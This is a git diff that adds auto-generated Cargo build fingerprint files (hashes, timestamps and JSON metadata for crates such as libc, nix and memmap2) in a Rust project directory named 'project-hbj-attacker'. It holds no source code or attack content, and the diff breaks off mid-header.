+++ b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-4f23730150718286/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-4f23730150718286/lib-lazy_static b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-4f23730150718286/lib-lazy_static
new file mode 100644
index 0000000..20c6e07
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-4f23730150718286/lib-lazy_static
@@ -0,0 +1 @@
+2a6a54a7773351db
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-4f23730150718286/lib-lazy_static.json b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-4f23730150718286/lib-lazy_static.json
new file mode 100644
index 0000000..0488083
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-4f23730150718286/lib-lazy_static.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[\"spin\", \"spin_no_std\"]","target":8659156474882058145,"profile":2225463790103693989,"path":16938603388992100689,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/lazy_static-4f23730150718286/dep-lib-lazy_static","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/dep-lib-lazy_static b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/dep-lib-lazy_static
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/dep-lib-lazy_static differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/lib-lazy_static b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/lib-lazy_static
new file mode 100644
index 0000000..f7018f2
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/lib-lazy_static
@@ -0,0 +1 @@
+43c68a50c05ba423
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/lib-lazy_static.json b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/lib-lazy_static.json
new file mode 100644
index 0000000..4e19e01
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/lazy_static-d550ab0b2fa2a527/lib-lazy_static.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[\"spin\", \"spin_no_std\"]","target":8659156474882058145,"profile":2241668132362809309,"path":16938603388992100689,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/lazy_static-d550ab0b2fa2a527/dep-lib-lazy_static","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/dep-lib-libc b/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/dep-lib-libc
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/dep-lib-libc differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/lib-libc b/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/lib-libc
new file mode 100644
index 0000000..62509bd
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/lib-libc
@@ -0,0 +1 @@
+ddf056b12428420f
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/lib-libc.json b/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/lib-libc.json
new file mode 100644
index 0000000..ff89def
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-4ae08a1ad5ce0106/lib-libc.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"extra_traits\", \"std\"]","declared_features":"[\"align\", \"const-extern-fn\", \"default\", \"extra_traits\", \"rustc-dep-of-std\", \"rustc-std-workspace-core\", \"std\", \"use_std\"]","target":17682796336736096309,"profile":15222631470922254920,"path":16382918871836466944,"deps":[[11499138078358568213,"build_script_build",false,10298560761286295484]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/libc-4ae08a1ad5ce0106/dep-lib-libc","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-5b9c6a9e0bfd637b/run-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/libc-5b9c6a9e0bfd637b/run-build-script-build-script-build
new file mode 100644
index 0000000..6e2ac40
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-5b9c6a9e0bfd637b/run-build-script-build-script-build
@@ -0,0 +1 @@
+bcff3ec272d6eb8e
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-5b9c6a9e0bfd637b/run-build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/libc-5b9c6a9e0bfd637b/run-build-script-build-script-build.json
new file mode 100644
index 0000000..475ac9f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-5b9c6a9e0bfd637b/run-build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"","declared_features":"","target":0,"profile":0,"path":0,"deps":[[11499138078358568213,"build_script_build",false,6073975453647753439]],"local":[{"RerunIfChanged":{"output":"debug/build/libc-5b9c6a9e0bfd637b/output","paths":["build.rs"]}},{"RerunIfEnvChanged":{"var":"RUST_LIBC_UNSTABLE_FREEBSD_VERSION","val":null}},{"RerunIfEnvChanged":{"var":"RUST_LIBC_UNSTABLE_MUSL_V1_2_3","val":null}},{"RerunIfEnvChanged":{"var":"RUST_LIBC_UNSTABLE_LINUX_TIME_BITS64","val":null}},{"RerunIfEnvChanged":{"var":"RUST_LIBC_UNSTABLE_GNU_FILE_OFFSET_BITS","val":null}},{"RerunIfEnvChanged":{"var":"RUST_LIBC_UNSTABLE_GNU_TIME_BITS","val":null}}],"rustflags":[],"config":0,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/build-script-build-script-build
new file mode 100644
index 0000000..a086271
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/build-script-build-script-build
@@ -0,0 +1 @@
+dfd01d697e184b54
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/build-script-build-script-build.json
new file mode 100644
index 0000000..1fb01ce
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"extra_traits\", \"std\"]","declared_features":"[\"align\", \"const-extern-fn\", \"default\", \"extra_traits\", \"rustc-dep-of-std\", \"rustc-std-workspace-core\", \"std\", \"use_std\"]","target":5408242616063297496,"profile":1565149285177326037,"path":4469354510698980383,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/libc-af26b483f3f56edc/dep-build-script-build-script-build","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/dep-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/dep-build-script-build-script-build
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/dep-build-script-build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-af26b483f3f56edc/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/dep-lib-libc b/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/dep-lib-libc
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/dep-lib-libc differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/lib-libc b/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/lib-libc
new file mode 100644
index 0000000..3ed6a92
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/lib-libc
@@ -0,0 +1 @@
+f4ff403b868deb5f
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/lib-libc.json b/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/lib-libc.json
new file mode 100644
index 0000000..dad002d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libc-f1dd82928ca28e39/lib-libc.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"extra_traits\", \"std\"]","declared_features":"[\"align\", \"const-extern-fn\", \"default\", \"extra_traits\", \"rustc-dep-of-std\", \"rustc-std-workspace-core\", \"std\", \"use_std\"]","target":17682796336736096309,"profile":6200076328592068522,"path":16382918871836466944,"deps":[[11499138078358568213,"build_script_build",false,10298560761286295484]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/libc-f1dd82928ca28e39/dep-lib-libc","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/dep-lib-libloading b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/dep-lib-libloading
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/dep-lib-libloading differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/lib-libloading b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/lib-libloading
new file mode 100644
index 0000000..911ece9
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/lib-libloading
@@ -0,0 +1 @@
+868860f2679c51a4
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/lib-libloading.json b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/lib-libloading.json
new file mode 100644
index 0000000..4e54d15
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-00e5bd6415ed9c43/lib-libloading.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":9378127968640496523,"profile":7654291482382329614,"path":17679103542882495130,"deps":[[7667230146095136825,"cfg_if",false,803604247905865523]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/libloading-00e5bd6415ed9c43/dep-lib-libloading","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/dep-lib-libloading b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/dep-lib-libloading
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/dep-lib-libloading differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/lib-libloading b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/lib-libloading
new file mode 100644
index 0000000..e39bb0f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/lib-libloading
@@ -0,0 +1 @@
+ca24b9e1fdf548db
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/lib-libloading.json b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/lib-libloading.json
new file mode 100644
index 0000000..89f34a4
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/libloading-0f2f8e24f8a6212c/lib-libloading.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":9378127968640496523,"profile":3679298682378043719,"path":17679103542882495130,"deps":[[7667230146095136825,"cfg_if",false,16864651187190583499]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/libloading-0f2f8e24f8a6212c/dep-lib-libloading","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/dep-lib-memmap2 b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/dep-lib-memmap2
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/dep-lib-memmap2 differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/lib-memmap2 b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/lib-memmap2
new file mode 100644
index 0000000..ff8dcbf
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/lib-memmap2
@@ -0,0 +1 @@
+9cb6632038d19a7c
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/lib-memmap2.json b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/lib-memmap2.json
new file mode 100644
index 0000000..d86983d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-2566ac7e0df66894/lib-memmap2.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[\"stable_deref_trait\"]","target":7046238114355185199,"profile":15657897354478470176,"path":2343943600280435247,"deps":[[11499138078358568213,"libc",false,6911773660789407732]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/memmap2-2566ac7e0df66894/dep-lib-memmap2","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/dep-lib-memmap2 b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/dep-lib-memmap2
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/dep-lib-memmap2 differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/lib-memmap2 b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/lib-memmap2
new file mode 100644
index 0000000..bfc4848
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/lib-memmap2
@@ -0,0 +1 @@
+a96dee423608d13c
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/lib-memmap2.json b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/lib-memmap2.json
new file mode 100644
index 0000000..332b75a
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/memmap2-68530ff6c8c70627/lib-memmap2.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[\"stable_deref_trait\"]","target":7046238114355185199,"profile":2241668132362809309,"path":2343943600280435247,"deps":[[11499138078358568213,"libc",false,1099485397091021021]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/memmap2-68530ff6c8c70627/dep-lib-memmap2","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/build-script-build-script-build
new file mode 100644
index 0000000..5084ecf
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/build-script-build-script-build
@@ -0,0 +1 @@
+72b6dfd0d241e937
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/build-script-build-script-build.json
new file mode 100644
index 0000000..84a1224
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"process\", \"ptrace\", \"uio\"]","declared_features":"[\"acct\", \"aio\", \"default\", \"dir\", \"env\", \"event\", \"fanotify\", \"feature\", \"fs\", \"hostname\", \"inotify\", \"ioctl\", \"kmod\", \"memoffset\", \"mman\", \"mount\", \"mqueue\", \"net\", \"personality\", \"pin-utils\", \"poll\", \"process\", \"pthread\", \"ptrace\", \"quota\", \"reboot\", \"resource\", \"sched\", \"signal\", \"socket\", \"syslog\", \"term\", \"time\", \"ucontext\", \"uio\", \"user\", \"zerocopy\"]","target":5408242616063297496,"profile":2225463790103693989,"path":16873847496812488938,"deps":[[1884099982326826527,"cfg_aliases",false,11900585525974625930]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/nix-05d246c86002f7b4/dep-build-script-build-script-build","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/dep-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/dep-build-script-build-script-build
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/dep-build-script-build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-05d246c86002f7b4/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/dep-lib-nix b/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/dep-lib-nix
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/dep-lib-nix differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/lib-nix b/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/lib-nix
new file mode 100644
index 0000000..6eee27a
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/lib-nix
@@ -0,0 +1 @@
+e1055c3771732915
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/lib-nix.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/lib-nix.json
new file mode 100644
index 0000000..32a8021
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-108c2ce175e78b93/lib-nix.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"process\", \"ptrace\", \"uio\"]","declared_features":"[\"acct\", \"aio\", \"default\", \"dir\", \"env\", \"event\", \"fanotify\", \"feature\", \"fs\", \"hostname\", \"inotify\", \"ioctl\", \"kmod\", \"memoffset\", \"mman\", \"mount\", \"mqueue\", \"net\", \"personality\", \"pin-utils\", \"poll\", \"process\", \"pthread\", \"ptrace\", \"quota\", \"reboot\", \"resource\", \"sched\", \"signal\", \"socket\", \"syslog\", \"term\", \"time\", \"ucontext\", \"uio\", \"user\", \"zerocopy\"]","target":1600181213338542824,"profile":15657897354478470176,"path":17896847802790571066,"deps":[[5150833351789356492,"build_script_build",false,13400472904926905381],[7667230146095136825,"cfg_if",false,803604247905865523],[9001817693037665195,"bitflags",false,12272798070039485847],[11499138078358568213,"libc",false,6911773660789407732]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/nix-108c2ce175e78b93/dep-lib-nix","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/dep-lib-nix b/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/dep-lib-nix
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/dep-lib-nix differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/lib-nix b/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/lib-nix
new file mode 100644
index 0000000..ea29155
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/lib-nix
@@ -0,0 +1 @@
+425f7688c91f8d92
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/lib-nix.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/lib-nix.json
new file mode 100644
index 0000000..583f179
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-1e5da1ae136c1959/lib-nix.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"process\", \"ptrace\"]","declared_features":"[\"acct\", \"aio\", \"default\", \"dir\", \"env\", \"event\", \"fanotify\", \"feature\", \"fs\", \"hostname\", \"inotify\", \"ioctl\", \"kmod\", \"memoffset\", \"mman\", \"mount\", \"mqueue\", \"net\", \"personality\", \"pin-utils\", \"poll\", \"process\", \"pthread\", \"ptrace\", \"quota\", \"reboot\", \"resource\", \"sched\", \"signal\", \"socket\", \"syslog\", \"term\", \"time\", \"ucontext\", \"uio\", \"user\", \"zerocopy\"]","target":1600181213338542824,"profile":15657897354478470176,"path":17896847802790571066,"deps":[[5150833351789356492,"build_script_build",false,13310720410062464595],[7667230146095136825,"cfg_if",false,803604247905865523],[9001817693037665195,"bitflags",false,12272798070039485847],[11499138078358568213,"libc",false,6911773660789407732]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/nix-1e5da1ae136c1959/dep-lib-nix","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/dep-lib-nix b/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/dep-lib-nix
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/dep-lib-nix differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/lib-nix b/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/lib-nix
new file mode 100644
index 0000000..b6e37e7
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/lib-nix
@@ -0,0 +1 @@
+17645094e7686ddb
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/lib-nix.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/lib-nix.json
new file mode 100644
index 0000000..6d6a300
--- /dev/null
